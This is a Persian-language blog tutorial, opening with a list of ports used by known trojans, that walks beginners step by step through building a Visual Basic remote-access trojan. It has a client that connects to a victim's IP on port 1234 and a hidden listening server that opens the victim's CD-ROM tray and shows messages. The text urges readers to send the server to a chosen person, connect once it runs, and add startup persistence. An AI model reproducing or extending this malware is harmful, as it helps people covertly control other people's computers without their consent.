Port 3791 ---------- eclipse
Port 4590 ------------ icqtrojan
Port 5400,5401,5402------------ blade runner, back construction
Port 6670,6771 -------------deep throat
Port 20000,20001 ------------- millennium
Port 20034 ------------- net bus
Port 30029 -------------- AOL Trojan
Port 54320,54321(udp) ------------ back orifice 2000

در اين مقاله سعي ميكنم تا جايي كه ممكنه موضوع را روان بيان كنم تا دوستاني كه با Visual Basic هم آشنايي ندارند بتوانند يك Trojan براي خودشون بسازند !!
با اين تروجان مي توانيد Cdrom قرباني را داخل وبيرون بياريد .
ومي توانيد براي قرباني Message بفرستيد !
خوب ! شروع مي كنيم :

VB=(Visual basic)

VB را اجرا كنيد
و گزينه Standard Exe را انتخاب كنيد

معمولا هر تروجان از 2 قسمت تشكيل شده
1.server كه براي قرباني ميفرستيم
2. Client خودمان باهاش كار مي كنيم

خوب ! ما اول با هم Client را مي سازيم (دقت كنيد !)
نام Form را به frmClient تغيير دهيد



يكي از ابزاري كه نياز داريم Winsock Control 6.0 براي ارتباط با پورت سرور
براي انتخاب اين گزينه : Ctrl+t را فشار دهيد يا در منوي Project گزينه Components را انتخاب كنيد.صفحه به نام Components باز ميشود كه بايد Winsock Control 6.0 را داخل ان پيدا وانتخاب كنيد !

اگر این ابزار وجود نداشت،باید در هنگام نصب vb آن را اضافه کنید.


بعد از انتخاب Winsock Control 6.0 اگر به نوار سمت چپ نگاه كنين شكلي بايد اضافه شده باشه :


---( Client )—
حالا بايد گزينه هاي زير روي frmClient قرار بگيرد

. 5 تا Command
.. 2 تا textbox
... 1 وينشك
... label 1



بعد نام تمام اين گزينه ها را تغيير دهيد (همانند نامهاي زير )!!! دقت كنيد(مانند تغيير نام Form)

Command1 - cmdConnect
Command2 - cmdDisconnect
Command3 - cmdOpen
Command4 - cmdClose
Command5 - cmdMsg
Label1 - lblStatus
Text1 - txtIP
Text2 - txtMsg
Winsock1 - tcpClient

Caption گزينه ها را هم تغيير دهيد



خوب الان ديگه وقت وارد كردن Code هاست
بر روي كليد Connect(command1)دوبار كليك كنيد و باز شدن صفحه كد زير را وارد ان كنيد. دقت كنيد كد بايد بين 2 كاراكتر زير وارد شود!(روبروي كد ها نوع كار كد به انگليسي توضيح داده شده .از اونم مي توانيد كمك بگيريد !

Private Sub cmdConnect_Click()
End Sub

اين كد را بين اين 2 كاراكتر كپي كنيد .... بقيه هم به همين نوبت !

cmdConnect.Enabled = False ' disable the connect button
cmdDisconnect.Enabled = True ' eable the connect button
lblStatus.Caption = "Connecting" 'Show that you are trying to connect
If txtIP.Text = "" Then 'if IP textbox is empty then
MsgBox "Please enter a valid IP adress", vbCritical 'then give a messagebox
End If
tcpClient.Connect txtIP.Text, 1234 'connect to the IP you entered and on port 1234

در ا ينجا ما پورت را برابر 1234 قرار مي ديم
روي كليد (Disconnect)(command2) نيز دو بار كليك كنيد وكد زير را وارد صفحه كنيد

lblStatus.Caption = "Not Connected" 'Show that you are not connected
cmdDisconnect.Enabled = False 'Disable the disconnect button
cmdConnect.Enabled = True 'Enable the Connect button again
tcpClient.Close 'Close the connection

حالا بر روي شكل Winsock روي form دو بار كليك كنيد . وقتي صفحه كدها باز شد
بالاي صفحه .سمت چپ از منو گزينه Connect را انتخاب كنيد



وبين دو كاراكتر ايجاد شده در صفحه كدها.

Private Sub tcpClient_Connect()

End Sub

كد زير را وارد كنيد :

lblStatus.Caption = "Connected" 'Show that your connected to the Server

بريم سراغ كدها سي دي رام :

بر روي كليد Open cd-rom (command 3)دو بار كليك كنيد و بين دو كاراكتر ايجاد شده در صفحه كد . كد زير را وارد كنيد

tcpClient.SendData "opn" 'send this string to the server

همين كار رو با كليد Close cdrom (command 4) انجام بدين وكد زير را بين كاركترهاي ايجاد شده قرار بدين

tcpClient.SendData "cls" 'send this string to the server

..روي كليد send massage (command 5) نيز دوبار كيك كنيد و كد زير را وارد كنيد

tcpClient.SendData "msg" & txtMsg 'send this string to the server and the text in the textbox

((((( تبريك ميگم ؟!! شما الان Client را درست كردين )))))
فقط كافيه به صورت Exe كپي بشه !!
همين !!!! اميدوارم Save كردنشو بلد باشي !!
ولي باشه . چون اول قول دادم كه طوري اموزش بدم كه افراد مبتدي هم حالي ببرند . مي گم
براي save :

File>make ……(project

نوبتم باشه . نوبت Server هست !!
بريييييييييييييم!
خوب يك Vb ديگه باز كنيد و Standard Exe را انتخاب كنيد
در اينجا هم به winsock نياز داريم . همون كاري كه براي اوردن winsockدر client انجام دادين . اينجا هم انجام بدين !

Winsockرا روي form قرار بدين .بعد نام فورم و وينشك را مطابق زير تغير بدين

Winsock = tcpServer
Form = frmServer

روي Form دو بار كليك كنيد و بين كاراكتر هاي ايجاد شده كد زير را كپي كنيد

me.hide
tcpServer.LocalPort = 1234 'listen on port 1234
tcpServer.Listen 'start listening

حالا روي Winsock دو بار كليك كنيد و از منوي سمت چپ گزينه connection requestرا انتخاب و بين دو كاراكتر ايجاد شده در صفحه كدها . كد زير را وارد كنيد

tcpServer.Close 'close to prevent any error
tcpServer.Accept requestID 'accept all incoming requests

دوباره با كليك بر روي Winsock از منوي سمت چپ صفحه كد باز شده گزينه errorرا انتخاب كنيد و بين كاراكترهاي ايجاد شده كد زير را كپي كنيد

On Error Resume Next 'to prevent any more error's
tcpServer.Close 'Close the connection
tcpServer.Listen 'listen again

حالا بايد يك module داشته باشيم براي آوردن آن :
Project> Add Module>open

حالا داخل Module زير را كپي كنيد

Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long

Dim SendStr As String, ReturnStr As String

Public Function DoCommand(command As String, data As String) 'The server is performing a command
Select Case LCase(command) 'Convert the command to lowercase and do a select case
Case "opn" 'the client sends the string opn
SendStr = mciSendString("Set cdaudio door open", ReturnStr, 0, 0) 'open the cd-rom door
Case "cls" 'the client sends the string cls
SendStr = mciSendString("Set cdaudio door closed", ReturnStr, 0, 0) 'close the cd-rom door
Case "msg" 'The client wants a message box to be shown
MsgBox data, vbInformation, "Information" ' Display the message to the server as a 'information messagebox
End Select 'end the select case
End Function 'end the function

Module را ببنديد
و روي Form دو بار كليك كنيد و كد زير را بالاي صفحه (دقت كنيد .بالا !) كپي كنيد

Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA"( ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long

دوباره روي Form كليك كنيد و كد زير را به صفحه كدها اضافه كنيد

Private Sub tcpServer_DataArrival(ByVal bytesTotal As Long)
Dim vardata As String
Dim strdata As String ' Variable for holding the data received
Dim cmddata As String * 3 ' This is for holding the command the server sent
tcpServer.GetData strdata ' Get the data sent
cmddata = Left(strdata, 3) ' This is the command the server sent
vardata = Right(strdata, Len(strdata) - 3) ' This is the variable data
DoCommand cmddata, vardata ' This function is in the commands module
End Sub

اينم تمام شد حالا save كنيد

خوب اينم از سرور ( تبريك مي گم . شما يك Trojan نوشتيد !؟ )
حالا كافيه سرور را براي شخص مورد نظر بفرسين و پس از اطمينان از اجراي ان در كامپيوترش با وارد كردن ip او در Client به سيستم او وصل بشين و .........!؟

البته اينو بگم كه سرور لود شدن در هر بار اجرای ویندوز و ... را ندارد و طبق آموزش های قبلی وبلاگ خودتان آن ها را اضافه کنید.